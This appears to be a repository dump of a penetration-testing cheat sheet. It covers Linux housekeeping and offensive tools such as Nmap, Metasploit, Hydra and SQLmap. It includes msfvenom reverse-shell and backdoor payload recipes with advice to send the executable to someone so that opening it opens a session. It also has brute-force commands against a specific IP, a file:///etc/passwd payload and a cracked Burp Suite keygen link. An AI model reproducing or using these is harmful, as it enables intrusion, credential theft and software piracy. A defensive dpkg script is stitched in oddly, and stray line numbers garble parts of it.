├── LinuxCheatSheet
├── README.md
├── cewl
└── wireshark

/LinuxCheatSheet:
--------------------------------------------------------------------------------
How to update/upgrade Linux:
What does APT do?

APT (Advanced Packaging Tool) is the set of core package-management tools found in the Debian operating system and its derivatives. It provides utilities for installing and removing software packages and their dependencies on a system.

apt is a front end that bundles the most commonly used apt-get and apt-cache commands into one tool for everyday package management.
apt-get is not being deprecated, but as a regular user you should start using apt more often.

sudo apt install
Installs a package

sudo apt remove
Removes a package (keeps its configuration files)

sudo apt purge
Removes a package together with its configuration files

sudo apt update
Refreshes the repository index

sudo apt upgrade
Upgrades all upgradable packages

sudo apt autoremove
Removes packages that were pulled in as dependencies and are no longer needed

sudo apt full-upgrade
Upgrades packages, removing or installing others as needed to resolve dependencies

sudo apt search
Searches for a package

sudo apt show
Shows package details

sudo apt list
Lists packages matching criteria (installed, upgradable, etc.)

sudo apt edit-sources
Edits the sources list

sudo apt clean
The clean command clears out the local repository of downloaded package files. It removes everything except the partial/ folder and the lock file from /var/cache/apt/archives/. Use apt clean to free up disk space when necessary, or as part of regularly scheduled maintenance.

sudo apt autoclean
autoclean is another way to clear out the local repository of downloaded package files, just like clean. The difference between clean and autoclean is that the latter only removes package files that can no longer be downloaded from their sources and are therefore very likely to be useless.

sudo apt update && sudo apt upgrade -y && sudo apt full-upgrade -y && sudo apt autoremove -y
===========================================================================================================================
First things to do after installing Linux:
1. Download and install the latest updates
sudo apt update && sudo apt upgrade
2. Install GNOME Tweak Tool
sudo apt install gnome-tweak-tool
3. Install Git
sudo apt install git
4. Install pip
sudo apt install python3-pip
5. Install GNOME Extensions
Just go to https://extensions.gnome.org/ to download and install your preferred extensions.
6. Play with a different desktop environment
To try MATE, run the following command in a terminal:
sudo apt install ubuntu-mate-desktop

To try Cinnamon, run the following command in a terminal:
sudo apt-get install cinnamon-desktop-environment

To try KDE, run the following command in a terminal:
sudo apt-get install kde-standard

===========================================================================================================================
How to install a .deb package with dpkg:

dpkg is a tool for installing, removing, and querying individual packages.
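dpkg -i installs whatever is in the .deb without consulting a repository, and it runs the package's maintainer scripts as root. The following wrapper is an added example (not part of the cheat sheet): it refuses to install unless the file's SHA-256 matches the digest the vendor publishes, and it lists the maintainer scripts so they can be read first. It assumes sha256sum (or shasum) and dpkg-deb are on PATH; the function names and the REVIEWED variable are this example's own.

```shell
#!/bin/sh
# Added example (not from the cheat sheet): gate "dpkg -i" on a checksum match
# and a look at the maintainer scripts that dpkg will execute as root.
# Assumes sha256sum (or shasum) and dpkg-deb are available.

# sha256_of FILE -> prints the lowercase hex SHA-256 digest of FILE
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_sha256 FILE EXPECTED -> returns 0 when the digest matches, 1 otherwise.
# EXPECTED may be upper- or lowercase hex, since vendors publish it either way.
verify_sha256() {
    actual=$(sha256_of "$1")
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ "$actual" = "$expected" ]
}

# list_maintainer_scripts DEB -> prints the names of the maintainer scripts
# (preinst/postinst/prerm/postrm) found in the package's control archive
list_maintainer_scripts() {
    dpkg-deb --ctrl-tarfile "$1" | tar -tf - 2>/dev/null \
        | sed 's#^\./##' | grep -E '^(pre|post)(inst|rm)$' || true
}

# install_verified DEB EXPECTED_SHA256
# Exit codes: 0 installed, 1 checksum mismatch, 2 maintainer scripts extracted
# for review (rerun with REVIEWED=1 after reading them).
install_verified() {
    deb=$1
    expected=$2
    if ! verify_sha256 "$deb" "$expected"; then
        echo "checksum mismatch for $deb (got $(sha256_of "$deb")); not installing" >&2
        return 1
    fi
    scripts=$(list_maintainer_scripts "$deb")
    if [ -n "$scripts" ] && [ "${REVIEWED:-0}" != "1" ]; then
        echo "$deb contains maintainer scripts that dpkg will run as root:" >&2
        echo "$scripts" | sed 's/^/  /' >&2
        dpkg-deb -e "$deb" "${deb%.deb}.control"   # extract DEBIAN/ for reading
        echo "extracted to ${deb%.deb}.control/; rerun with REVIEWED=1 once read" >&2
        return 2
    fi
    sudo dpkg -i "$deb"
}

# Usage: install_verified ~/Downloads/file.deb <sha256 from the vendor's download page>
```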

dpkg -i ~/Downloads/file.deb
===========================================================================================================================
How to fix the HTB OpenVPN connection issue:
# vim /etc/sysctl.conf

Set the following to 0 (0 leaves IPv6 enabled):
net.ipv6.conf.all.disable_ipv6 = 0
net.ipv6.conf.default.disable_ipv6 = 0
net.ipv6.conf.lo.disable_ipv6 = 0
===========================================================================================================================
Virtual Machine Network Types:

Bridge mode:
Connects the virtual network adapter directly to the physical network

NAT:
Allows the virtual network adapter to share the host's IP address

Host Only:
Creates a private network that the virtual network adapter shares with the host

Custom:
Allows you to create your own virtual network
===========================================================================================================================
Free BurpSuite Pro installation:
https://ftuapps.dev/burp-suite-professional-edition-v2-0-11-full-all-addons-keygen/
1. Download and extract
2. Run 'BurpSuite Loader & Keygen'
3. Press 'run' in the upper right-hand corner and Burp Suite will load
===========================================================================================================================
How to uncompress with tar:

-x = extract
-z = gzipped archive
-f = read from a file (the file name must follow it, so -f goes last in the flag group)

'sudo tar -xzf utorrent-server-3.0-ubuntu-10.10-27079.tar.gz'
===========================================================================================================================
Routersploit:

Install:
sudo apt-get install python-dev python-pip libncurses5-dev git
git clone https://github.com/reverse-shell/routersploit
cd routersploit
pip install -r requirements.txt
./rsf.py

1. Exploits. Pick the module (press Tab twice to complete the module name):
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/

rsf > use exploits/dlink/dir_300_600_rce

2. Creds:
Modules located under the creds/ directory allow running dictionary attacks against various network services.
The following services are currently supported:

ftp
ssh
telnet
http basic auth
http form auth
snmp

rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >

===========================================================================================================================
CrackMapExec

CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality, which lets it evade most endpoint protection/IDS/IPS solutions.

CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques.

Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios.

"crackmapexec smb <target>"
"crackmapexec smb <target> --pass-pol"
enumerates the password policy
"crackmapexec smb <target> --shares -u <user> -p <password>"
===========================================================================================================================
SmbClient:
smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program.
Operations include getting files from the server to the local machine, putting files from the local machine onto the server, retrieving directory information from the server, and so on.
smbclient -L //<ip>
enumerates the shares on a server
smbclient //<ip>/<share>

Mount on the host OS instead of using smbclient:
sudo mkdir /mnt/user
sudo mount -t cifs //<ip>/<share> /mnt/<dir>
sudo mount -t cifs //10.10.10.178/Data /mnt/Data
find . -ls -type f
shows files

===========================================================================================================================
SmbMap:
SMBMap allows users to enumerate Samba share drives across an entire domain. It lists share drives, drive permissions and share contents, offers upload/download functionality and file-name pattern matching with auto-download, and can even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

"smbmap -H <ip>"
===========================================================================================================================
Nmap:
Top 13 Nmap command examples:

1. Basic Nmap scan against an IP or host
"nmap 1.1.1.1"

Now, if you want to scan a hostname, simply replace the IP with the host name:
"nmap cloudflare.com"

These kinds of basic scans are perfect for your first steps when starting with Nmap.

2. Scan specific ports or an entire port range on a local or remote server
nmap -p 1-65535 localhost

Nmap is able to scan all possible ports, but you can also scan specific ports, which reports results faster. See below:
nmap -p 80,443 8.8.8.8

3. Scan multiple IP addresses
nmap 1.1.1.1 8.8.8.8

You can also scan consecutive IP addresses:
nmap 1.1.1.1,2,3,4
This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4.

4. Scan IP ranges
nmap 8.8.8.0/28

This will scan 14 consecutive IP addresses, from 8.8.8.1 to 8.8.8.14.
An alternative is to simply use this kind of range:
nmap 8.8.8.1-14

You can even use wildcards to scan an entire class C range, for example:
nmap 8.8.8.*
This will scan 256 IP addresses, from 8.8.8.0 to 8.8.8.255.

If you ever need to exclude certain IPs from the range scan, you can use the "--exclude" option, as you see below:
nmap 8.8.8.* --exclude 8.8.8.1

5. Scan the most popular ports

Using the "--top-ports" parameter along with a number lets you scan the top X most common ports for that host.
"nmap --top-ports 20 192.168.1.106"
Replace "20" with the desired number.

6. Scan hosts and IP addresses read from a text file:
Let's suppose you create a list.txt file that contains these lines:
192.168.1.106
cloudflare.com
microsoft.com
securitytrails.com
The "-iL" parameter lets you read from that file and scan all those hosts for you:
"nmap -iL list.txt"

7. Save your Nmap scan results to a file
"nmap -oN output.txt securitytrails.com"

8. Disabling DNS name resolution
If you need to speed up your scans a little, you can disable reverse DNS resolution for all your scans. Just add the "-n" parameter.
"nmap -p 80 -n 8.8.8.8"

9. Scan + OS and service detection with fast execution:
Using the "-A" parameter enables OS and service detection; here it is combined with "-T4" for faster execution.
"nmap -A -T4 cloudflare.com"

10. Detect service/daemon versions:
This is done with the -sV parameter
"nmap -sV localhost"

11. CVE detection using Nmap:
One of Nmap's greatest features. If you want to run a full vulnerability test against your target, you can use these parameters:
"nmap -Pn --script vuln 192.168.1.105"

12. FTP brute force attack:
"nmap --script ftp-brute -p 21 192.168.1.105"

13. Scan for MySQL on port 3306
"nmap 10.10.10.50 -p 3306"

===========================================================================================================================
How to look up the IP address of a website:

nslookup www.whateversite.com
===========================================================================================================================
How to pull a file using Burpsuite:

In a Repeater tab, at the bottom of the request header, type:
'url=file:///etc/passwd'
===========================================================================================================================
#Gobuster:
Common command line options

-fw – force processing of a domain with wildcard results.
-np – hide the progress output.
-m – which mode to use, either dir or dns (default: dir).
-q – disables banner/underline output.
-t – number of threads to run (default: 10).
-u – full URL (including scheme), or base domain name.
-v – verbose output (show all results).
-w – path to the wordlist used for brute forcing (use - for stdin).

Command line options for dns mode

-cn – show CNAME records (cannot be used with the '-i' option).
-i – show all IP addresses for the result.

Command line options for dir mode

-a – specify a user agent string to send in the request header.
-c – use this to specify any cookies that you might need (simulating auth).
-e – specify extended mode that renders the full URL.
-f – append / for directory brute forces.
-k – skip verification of SSL certificates.
-l – show the length of the response.
-n – "no status" mode, disables the output of the result's status code.
-o – specify a file name to write the output to.
-p – specify a proxy to use for all requests (scheme must match the URL scheme).
-r – follow redirects.
-s – comma-separated list of status codes to be deemed a "positive" (default: 200,204,301,302,307).
-x – list of extensions to check for, if any.
-P – HTTP Authorization password (Basic Auth only, prompted if missing).
-U – HTTP Authorization username (Basic Auth only).
-to – HTTP timeout. Examples: 10s, 100ms, 1m (default: 10s).
"gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u https://10.10.10.84"

gobuster vhost -w /opt/SecLists/Discovery/DNS/subdomains-top1million.txt -u http://forwardslash.htb
===========================================================================================================================
Nikto:

Nikto is a web server scanner: it enables you to get insights about the host IP address, operating system detection and other network security details that are important during penetration testing.

perl nikto.pl -host 209.17.116.7 -useragent bob
===========================================================================================================================

#Wfuzz:

Wfuzz can be used to look for hidden content, such as files and directories, within a web server, which helps to find further attack vectors. It is worth noting that the success of this task depends highly on the dictionaries used.

Wfuzz looking for common directories:
"wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ"

Wfuzz looking for common files:
"wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ.php"

You often want to fuzz some sort of data in the URL's query string; this can be achieved by specifying the FUZZ keyword in the URL after a question mark:
"wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ"
===========================================================================================================================
Setting up Metasploit:
systemctl start postgresql
msfdb init
db_status

Metasploit Pro:
https://localhost:3790/
===========================================================================================================================
Meterpreter Commands:

Core Commands
=============

    Command                     Description
    -------                     -----------
    ?                           Help menu
    background                  Backgrounds the current session
    bg                          Alias for background
    bgkill                      Kills a background meterpreter script
    bglist                      Lists running background scripts
    bgrun                       Executes a meterpreter script as a background thread
    channel                     Displays information or control active channels
    close                       Closes a channel
    disable_unicode_encoding    Disables encoding of unicode strings
    enable_unicode_encoding     Enables encoding of unicode strings
    exit                        Terminate the meterpreter session
    get_timeouts                Get the current session timeout values
    guid                        Get the session GUID
    help                        Help menu
    info                        Displays information about a Post module
    irb                         Open an interactive Ruby shell on the current session
    load                        Load one or more meterpreter extensions
    machine_id                  Get the MSF ID of the machine attached to the session
    migrate                     Migrate the server to another process
    pivot                       Manage pivot listeners
    pry                         Open the Pry debugger on the current session
    quit                        Terminate the meterpreter session
    read                        Reads data from a channel
    resource                    Run the commands stored in a file
    run                         Executes a meterpreter script or Post module
    secure                      (Re)Negotiate TLV packet encryption on the session
    sessions                    Quickly switch to another session
    set_timeouts                Set the current session timeout values
    sleep                       Force Meterpreter to go quiet, then re-establish session.
    transport                   Change the current transport mechanism
    use                         Deprecated alias for "load"
    uuid                        Get the UUID for the current session
    write                       Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command     Description
    -------     -----------
    arp         Display the host ARP cache
    getproxy    Display the current proxy configuration
    ifconfig    Display interfaces
    ipconfig    Display interfaces
    netstat     Display the network connections
    portfwd     Forward a local port to a remote service
    resolve     Resolve a set of host names on the target
    route       View and modify the routing table


Stdapi: User interface Commands
===============================

    Command          Description
    -------          -----------
    enumdesktops     List all accessible desktops and window stations
    getdesktop       Get the current meterpreter desktop
    idletime         Returns the number of seconds the remote user has been idle
    keyboard_send    Send keystrokes
    keyevent         Send key events
    keyscan_dump     Dump the keystroke buffer
    keyscan_start    Start capturing keystrokes
    keyscan_stop     Stop capturing keystrokes
    mouse            Send mouse events
    screenshare      Watch the remote user's desktop in real time
    screenshot       Grab a screenshot of the interactive desktop
    setdesktop       Change the meterpreter's current desktop
    uictl            Control some of the user interface components


Stdapi: System Commands
=======================

    Command        Description
    -------        -----------
    clearev        Clear the event log
    drop_token     Relinquishes any active impersonation token.
    execute        Execute a command
    getenv         Get one or more environment variable values
    getpid         Get the current process identifier
    getprivs       Attempt to enable all privileges available to the current process
    getsid         Get the SID of the user that the server is running as
    getuid         Get the user that the server is running as
    kill           Terminate a process
    localtime      Displays the target system's local date and time
    pgrep          Filter processes by name
    pkill          Terminate processes by name
    ps             List running processes
    reboot         Reboots the remote computer
    reg            Modify and interact with the remote registry
    rev2self       Calls RevertToSelf() on the remote machine
    shell          Drop into a system command shell
    shutdown       Shuts down the remote computer
    steal_token    Attempts to steal an impersonation token from the target process
    suspend        Suspends or resumes a list of processes
    sysinfo        Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command          Description
    -------          -----------
    record_mic       Record audio from the default microphone for X seconds
    webcam_chat      Start a video chat
    webcam_list      List webcams
    webcam_snap      Take a snapshot from the specified webcam
    webcam_stream    Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command    Description
    -------    -----------
    play       Play a waveform audio file (.wav) on the target system


Priv: Elevate Commands
======================

    Command      Description
    -------      -----------
    getsystem    Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command     Description
    -------     -----------
    hashdump    Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command      Description
    -------      -----------
    timestomp    Manipulate file MACE attributes

Creating an executable backdoor with Metasploit:
"msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.141 LPORT=4444 -f exe -o payload.exe"
The payload.exe file is saved in the directory where you executed the command.
Upload this file to GitHub or send it to someone; once they open it, your meterpreter session will start

LHOST= your IP
RHOST= target IP

List payloads:
"msfvenom -l payloads"

Linux Meterpreter reverse shell:
"msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf"

Linux bind Meterpreter shell:
"msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<ip> LPORT=<port> -f elf > bind.elf"

Linux bind shell:
"msfvenom -p generic/shell_bind_tcp RHOST=<ip> LPORT=<port> -f elf > term.elf"

Windows Meterpreter reverse TCP shell:
"msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe"

Windows reverse TCP shell:
"msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe"

Windows encoded Meterpreter reverse shell:
"msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe"

Mac reverse shell:
"msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho > shell.macho"

Mac bind shell:
"msfvenom -p osx/x86/shell_bind_tcp RHOST=<ip> LPORT=<port> -f macho > bind.macho"

Web payloads:

PHP Meterpreter reverse TCP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
(prepends the <?php tag that the raw output omits, using the macOS pbcopy/pbpaste clipboard tools)

ASP Meterpreter reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f asp > shell.asp

JSP Java Meterpreter reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war

Scripting payloads

Python reverse shell
msfvenom -p cmd/unix/reverse_python LHOST=<ip> LPORT=<port> -f raw > shell.py

Bash Unix reverse shell
msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=<port> -f raw > shell.sh

Perl Unix reverse shell
msfvenom -p cmd/unix/reverse_perl LHOST=<ip> LPORT=<port> -f raw > shell.pl

Shellcode

Windows Meterpreter reverse TCP shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <format>

Linux Meterpreter reverse TCP shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <format>

Mac reverse TCP shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f <format>

Create user
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe

Metasploit handler:

use exploit/multi/handler
set PAYLOAD <payload>
set RHOST <ip>
set LHOST <ip>
set LPORT <port>
run

msf > use multi/handler
msf exploit(handler) > set RHOST <ip>
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <ip>
msf exploit(handler) > set LPORT <port>
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.75.35:4444
[*] Starting the payload handler...

SSH user enumeration in Metasploit:
use auxiliary/scanner/ssh/ssh_enumusers
> set RHOSTS <ip>
> set USERNAME admin
> run

===========================================================================================================================
Netcat:

Basic chat server:
On your first machine type:
"nc -l 2222"
This will simply listen on port 2222 for any incoming data. On another machine run:
"nc 192.168.0.31 2222"
Next, type anything at all, e.g. "hello world!", and you'll see it echoed on the listener's shell. Any text entered into either of the shells ends up being displayed on the other machine as well.

File transfer - from the server side (listener):

We'll transfer a file from one box (the server) to another box (the client).
So as soon as the server receives a connection, the file gets transferred. On the machine where the file exists run the following command: 623 | "nc -l 2222 < filename >" 624 | 625 | On the box where you'd like to receive the file, run: 626 | 627 | "nc 192.168.0.31 2222 > any_file_name" 628 | 629 | Note that if you don't point the data to any_filename, the data will just be displayed in the shell at the receiving end. Also, obviously the receiving file any_file_name can be any file name (but is normally the same as the original). 630 | 631 | If you wanted to append the contents of filename to an already existing any_filename, you could use this instead: 632 | 633 | "nc 192.168.0.31 2222 >> any_file_name" 634 | 635 | Note the '>>' rather than just a single '>' (the '>>' appends while the > replaces). 636 | File transfer - from the client side 637 | 638 | To transfer a file in the opposite direction use: 639 | 640 | "nc -l 2222 > file_copy" 641 | 642 | On the client side (sender in this case) use: 643 | 644 | "cat file_to_send | nc 192.168.0.31 2222" 645 | 646 | To keep the listening open for further data, use the the -k option: 647 | 648 | "nc -lk 2222 >> file" 649 | 650 | =========================================================================================================================== 651 | Python server for when you want to transfer a file 652 | sudo python3 -m http.server 80 653 | =========================================================================================================================== 654 | Crunch Wordlist: 655 | crunch 4 4 012345abcdef -o Documents/pass.txt 656 | =========================================================================================================================== 657 | Hydra: 658 | Install hydra with the following commands: 659 | $ git clone https://github.com/vanhauser-thc/thc-hydra.git 660 | $ cd thc-hydra/ 661 | $ ./configure 662 | $ make 663 | $ make install 664 | 665 | hydra -l admin -P 
/home/kali/htb/nineveh/10k 10.10.10.43 http-post-form "/department/login.php:username=^user^&password=^PASS^:Invalid" -t 64 666 | 667 | hydra -l root -p admin 69.167.51.201 -t 4 ssh 668 | 669 | hydra -l root -P /usr/share/wordlists/metasploit/piata_ssh_userpass.txt 69.167.51.201 -t 4 670 | 671 | =========================================================================================================================== 672 | Medusa: 673 | "medusa -h 192.168.1.1 -u "admin" -P hugewordlist.txt -M http" 674 | 675 | -h [TARGET] 676 | Target hostname or IP address. 677 | 678 | -H [FILE] 679 | Reads target specifications from the file specified rather than from the command line. The file should contain a list separated by newlines. 680 | 681 | -u [TARGET] 682 | Target username. 683 | 684 | -U [FILE] 685 | Reads target usernames from the file specified rather than from the command line. The file should contain a list separated by newlines. 686 | 687 | -p [TARGET] 688 | Target password. 689 | 690 | -P [FILE] 691 | Reads target passwords from the file specified rather than from the command line. The file should contain a list separated by newlines. 692 | 693 | -C [FILE] 694 | File containing combo entries. Combo files are colon separated and in the following format: host:user:password. If any of the three fields are left empty, the respective information should be provided either as a single global value or as a list in a file. 695 | 696 | -O [FILE] 697 | File to append log information to. Medusa will log all accounts credentials found to be valid or cause an unknown error. It will also log the start and stop times of an audit, along with the calling parameters. 698 | 699 | -e [n/s/ns] 700 | Additional password checks ([n] No Password, [s] Password = Username). If both options are being used, they should be specified together ("-e ns"). If only a single option is being called use either "-e n" or "-e s". 

-M [TEXT]
Name of the module to execute (without the .mod extension).

-m [TEXT]
Parameter to pass to the module. This can be passed multiple times with a different parameter each time, and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.)

-d
Dump all known modules.

-n [NUM]
Use for a non-default TCP port number.

-s
Enable SSL.

-g [NUM]
Give up after trying to connect for NUM seconds (default 3).

-r [NUM]
Sleep NUM seconds between retry attempts (default 3).

-R [NUM]
Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-t [NUM]
Total number of logins to be tested concurrently. It should be noted that roughly t x T threads could be running at any one time. 381 appears to be the limit on my fairly boring Gentoo Linux host.

-T [NUM]
Total number of hosts to be tested concurrently.

-L
Parallelize logins using one username per thread. The default is to process the entire username before proceeding.

-f
Stop scanning host after first valid username/password found.

-F
Stop audit after first valid username/password found on any host.

-b
Suppress startup banner

-q
Display module's usage information. This should be used in conjunction with the "-M" option. For example, "medusa -M smbnt -q".

-v [NUM]
Verbose level [0 - 6 (more)]. All messages at or below the specified level will be displayed. The default level is 5.

-w [NUM]
Error debug level [0 - 10 (more)]. All messages at or below the specified level will be displayed. The default level is 5.
753 | 754 | -V 755 | Display version 756 | 757 | Available Medusa Modules: 758 | 759 | afp.mod : Brute force module for AFP sessions 760 | cvs.mod : Brute force module for CVS sessions 761 | ftp.mod : Brute force module for FTP/FTPS sessions 762 | http.mod : Brute force module for HTTP 763 | imap.mod : Brute force module for IMAP sessions 764 | mssql.mod : Brute force module for MSSQL sessions 765 | mysql.mod : Brute force module for MySQL sessions 766 | nntp.mod : Brute force module for NNTP sessions 767 | pcanywhere.mod : Brute force module for PcAnywhere sessions 768 | pop3.mod : Brute force module for POP3 sessions 769 | postgres.mod : Brute force module for PostgreSQL sessions 770 | rdp.mod : Brute force module for RDP (Microsoft Terminal Server) sessions 771 | rexec.mod : Brute force module for REXEC sessions 772 | rlogin.mod : Brute force module for RLOGIN sessions 773 | rsh.mod : Brute force module for RSH sessions 774 | smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions 775 | smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) 776 | smtp.mod : Brute force module for SMTP Authentication with TLS 777 | snmp.mod : Brute force module for SNMP Community Strings 778 | ssh.mod : Brute force module for SSH v2 sessions 779 | svn.mod : Brute force module for Subversion sessions 780 | telnet.mod : Brute force module for telnet sessions 781 | vmauthd.mod : Brute force module for the VMware Authentication Daemon 782 | vnc.mod : Brute force module for VNC sessions 783 | web-form.mod : Brute force module for web form 784 | wrapper.mod : Generic Wrapper Module 785 | 786 | =========================================================================================================================== 787 | SQLmap: 788 | sqlmap -r search.req --batch --force-ssl 789 | sqlmap -r login.req --batch --force-ssl461 790 | -'search.req = info from search bar results using BurpSuite Repeater using 'Copy to File' 791 | -'login.req = info 
from login screen using results from BurpSuite Repeater using 'Copy to File' 792 | =========================================================================================================================== 793 | How to set a WiFi adapter in Monitor Mode: 794 | ifconfig wlan0 down 795 | iwconfig wlan0 mode monitor 796 | ifconfig wlan0 up 797 | 798 | or 799 | 800 | airmon-ng check kill 801 | airmon-ng start wlan0 802 | =========================================================================================================================== 803 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LinuxCheatSheet 2 | 3 | 4 | Topics include (not in order):
Updating/upgrading Kali Linux
installing PIP & Git
Virtual Machine Network Types
How to install a dpkg file
Nmap
crackmapexec
mslookup
Smbclient
Smbmap
Metasploit
Meterpreter commands
Msfvenom
Wfuzz
Gobuster
Netcat
How to start a Python server
Crunch
Hydra
SQLmap
How to put a Network adapter in monitor-mode
How to fix common Hack The Box VPN connection issue
Wireshark Filters
--------------------------------------------------------------------------------
/cewl:
--------------------------------------------------------------------------------
Default Method:
Enter the following command, which spiders the given URL to a specified depth and prints a list of words that can then be used as a dictionary for password cracking.
cewl http://www.randomsite.com

To save it to a wordlist:
'-w file.txt'
cewl http://www.randomsite.com -w wordlist.txt

To see your wordlist:
cat wordlist.txt (or whatever you named it)

Generating Wordlist of Specific Length:
'-m 9'
cewl https://randomsite.com -m 9
The above command will generate a list of words with a minimum length of 9 characters.

Retrieving Emails from a Website:
The -e option enables email extraction.
The -n option hides the list of words generated while crawling the given website.
cewl https://randomsite.com -n -e

Count the number of times each word is repeated on a website:
The -c option enables the count parameter.
cewl https://randomsite.com -c

Increase the Depth to Spider:
To generate a larger list by enumerating more words from the website, use the -d option followed by the depth level; a higher depth makes the crawl more intensive. By default the depth level is 2.
cewl https://randomsite.com -d 2

Extra Debug Information:
Use the --debug option to enable debug mode and show errors and raw details of a website while crawling.
cewl https://randomsite.com --debug

Verbose Mode:
To expand the crawling result and retrieve full details of a website, use the -v option for verbose mode. Rather than only generating a wordlist, it will dump the information available on the website.
cewl https://randomsite.com -v

Generating Alpha-Numeric:
If you want to generate an alpha-numeric wordlist, add the --with-numbers option to the command.
cewl http://randomsite.com --with-numbers

Cewl with Digest/Basic Authentication:
If the website requires HTTP authentication to log in, the default command above will not work properly; to generate a wordlist you need to authenticate using the following parameters:
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.
cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v
cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v
--------------------------------------------------------------------------------
/wireshark:
--------------------------------------------------------------------------------
Wireshark Filters:


Filtering traffic from one server:

ip.addr eq <ip>

Filtering traffic between two servers:

ip.addr eq <ip1> and ip.addr eq <ip2>

Filtering traffic of standard protocols:

smtp

ldap

ssl

http

dns

Filtering an SMTP conversation between two servers:

ip.addr eq <ip1> and ip.addr eq <ip2> and smtp

Filtering an HTTP conversation between two servers:

ip.addr eq <ip1> and ip.addr eq <ip2> and http

Filtering an SMTP conversation with TLS between two servers:

ip.addr eq <ip1> and ip.addr eq <ip2> and ssl

Filtering outgoing packets from one particular IP:

ip.src eq <ip>

Filtering incoming packets to one particular IP:

ip.dst eq <ip>

Filtering the number of SMTP sessions:

smtp.req.command eq QUIT

Filtering the number of transmitted mails:

smtp.req.command eq MAIL

Filtering the number of recipients in an SMTP conversation:

smtp.req.command eq RCPT

Filtering a specific recipient mailbox:

smtp.req.command eq RCPT and smtp.req.parameter contains "user@domain.com"

Filtering a specific sender mailbox:

smtp.req.command eq MAIL and smtp.req.parameter contains "user@domain.com"

Filtering SMTP errors:

If you know the error code then use this filter:

smtp.response.code eq <code>

for example: smtp.response.code eq 421

If you don't know it, or if you want to list all SMTP errors in the SMTP sessions, then you must first exclude all the valid codes (2XX and 3XX) until you end up only with 4XX or 5XX codes.

not smtp.response.code eq 220 and not smtp.response.code eq 221 and not smtp.response.code eq 250 and not smtp.response.code eq 354 and smtp.response.code

